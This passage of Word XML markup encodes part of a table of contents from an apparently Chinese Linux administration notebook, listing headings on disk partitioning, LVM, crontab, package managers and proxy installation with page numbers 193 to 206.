          <w:hyperlink w:anchor="_Toc159779711" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779711 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>193</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06D56931" w14:textId="2DC54F08" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779712" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>定时任务中如何使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>conda</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的环境</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>:bash_rc</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>中提前写好环境变量</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779712 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>194</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44313F43" w14:textId="48866ACB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779713" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>磁盘分区管理：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>fdisk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779713 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>194</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3054CB9A" w14:textId="2DC8685E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779714" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>磁盘与磁盘分区、分区表、文件系统的关系</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779714 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>195</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="401399C1" w14:textId="06B5BA25" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779715" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>fdisk</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>操作：编辑分区</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779715 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>195</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AFE4D8A" w14:textId="752581C9" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779716" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>格式化分区，制作文件系统</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779716 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>197</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18F18B77" w14:textId="60B93859" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779717" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>持久化挂载磁盘</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779717 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>197</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05801007" w14:textId="3785EC58" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779718" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>lvm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779718 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>198</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CF38E13" w14:textId="0EDC4EE1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779719" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>crontab</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779719 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>201</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="469E24DA" w14:textId="401E3471" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779720" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>smtp</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：感觉</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mail</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mailx</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>都没啥用，不如写个</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>py</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>脚本还能用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779720 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BF890A5" w14:textId="039FACB8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779721" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>权限操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779721 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49D1CE6D" w14:textId="18159459" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779722" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>定时任务</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779722 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10E90630" w14:textId="0C836BB9" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779723" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ubuntu</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>dpkg:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>卸载、安装、清理无效依赖</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779723 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>205</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="569F2A11" w14:textId="7B9F8CCC" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779724" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>yum(rpm)</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>apt-get(dpkg)</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的对应关系</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779724 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>206</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="331DA4B8" w14:textId="7B664F16" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779725" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ubuntu22.04</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SSR:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>不推荐</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779725 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>206</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1344F8D1" w14:textId="47E5E39E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779726" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>v2ray</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779726 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>206</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="580A38D3" w14:textId="6E5897DB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779727" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
